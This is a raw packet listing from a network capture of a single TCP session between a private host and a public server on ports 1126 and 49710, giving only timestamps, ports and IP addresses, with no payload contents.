Oct 12, 2024 20:30:05.229707956 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.229742050 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.229744911 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.229774952 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.229809046 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.229811907 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.229842901 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.229882002 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.230815887 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.230844975 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.230880022 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.230885983 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.230972052 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.231009007 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.231015921 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.231064081 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.231102943 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.231121063 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.231177092 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.231208086 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.231218100 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.231241941 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.231280088 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.231281996 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.231318951 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.231347084 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.231362104 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.231379032 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.231421947 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.231430054 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.231463909 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.231497049 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.231503963 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.231528997 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.231563091 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.231564999 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.231597900 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.231631994 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.231638908 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.231664896 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.231703043 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.231705904 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.233057022 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.233108997 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.233146906 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.233180046 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.233221054 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.233233929 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.233288050 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.233330965 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.233347893 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.233406067 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.233448982 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.233463049 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.233515978 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.233562946 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.233575106 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.233608961 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.233647108 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.233663082 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.233716965 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.233763933 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.233767986 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.233799934 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.233834982 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.233840942 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.233872890 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.233906031 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.233911037 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.233938932 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.233974934 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.233978987 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.234006882 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.234040022 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.234046936 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.234072924 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.234105110 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.234108925 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.234137058 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.234169960 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.234173059 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.234200954 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.234234095 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.234241962 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.234266996 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.234298944 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.234302044 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.234333992 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.234368086 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.234375954 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.234400988 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.234433889 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.234442949 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.234464884 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.234498978 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.234507084 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.234533072 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.234575033 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.319056988 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.319098949 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.319133043 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.319175005 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.319210052 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.319227934 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.319227934 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.319242001 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.319276094 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.319303989 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.320434093 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.320478916 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.320571899 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.320605040 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.320641994 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.320647955 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.320703030 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.320760012 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.320797920 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.320816040 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.320858955 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.320871115 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.320923090 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.320975065 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.321003914 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.321058989 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.321094990 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.321105957 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.321126938 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.321166039 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.321173906 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.321199894 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.321233988 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.321240902 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.321266890 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.321300983 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.321315050 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.321336985 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.321371078 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.321417093 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.321419001 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.321453094 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.321468115 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.321485996 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.321518898 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.321532965 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.321551085 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.321585894 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.321603060 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.321620941 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.321654081 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.321666956 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.321686983 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.321721077 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.321727991 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.321753979 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.321787119 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.321794033 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.321820021 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.321856976 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.321861029 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.321903944 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.321965933 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.321978092 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.321995974 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.322030067 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.322046041 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.322067022 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.322099924 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.322117090 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.322137117 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.322187901 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.322187901 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.322225094 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.322273016 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.323331118 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.323411942 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.323462963 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.323468924 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.323522091 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.323554039 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.323566914 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.323596001 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.323641062 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.323651075 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.323688030 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.323723078 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.323734045 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.323780060 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.323828936 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.323829889 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.323862076 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.323894978 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.323908091 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.323934078 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.323990107 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.324008942 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.324028969 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.324063063 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.324079990 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.324096918 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.324129105 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.324139118 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.324162960 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.324193954 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.324210882 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.324228048 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.324259996 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.324291945 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.324294090 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.324326992 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.324337006 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.324362993 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.324395895 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.324409962 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.324434042 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.324480057 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.325685978 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.325721979 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.325757980 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.325761080 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.325814009 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.325865984 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.325867891 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.325906992 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.325949907 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.325969934 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.326030970 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.326069117 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.326081038 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.326117039 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.326159000 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.326169968 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.326230049 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.326272011 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.326283932 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.326339006 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.326381922 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.326394081 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.326447010 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.326483965 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.326488018 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.326513052 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.326550961 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.326556921 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.326589108 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.326621056 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.326631069 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.326653004 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.326684952 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.326694965 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.326719046 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.326750040 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.326759100 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.326783895 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.326814890 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.326822042 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.326848030 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.326879978 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.326889992 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.326915026 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.326948881 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.326953888 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.326991081 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.327023983 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.327032089 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.327058077 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.327089071 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.327101946 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.327124119 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.327142954 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.327157974 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.327162027 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.327172995 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.327195883 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.367270947 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.411551952 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.411616087 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.411647081 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.411676884 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.411681890 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.411721945 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.411748886 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.411753893 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.411788940 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.411814928 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.411822081 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.411866903 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.412986994 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.413018942 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.413074017 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.413077116 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.413156033 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.413203955 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.413212061 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.413249969 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.413300991 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.413305044 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.413360119 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.413405895 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.413413048 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.413466930 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.413506985 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.413522959 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.413568020 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.413613081 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.413620949 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.413671970 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.413706064 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.413724899 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.413741112 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.413774967 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.413809061 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.413813114 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.413845062 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.413876057 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.413877964 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.413912058 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.413938999 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.413944960 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.413978100 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.413990021 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.414011002 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.414042950 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.414056063 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.414072037 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.414103985 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.414113045 CEST	49710	1126	192.168.2.6	146.70.24.213
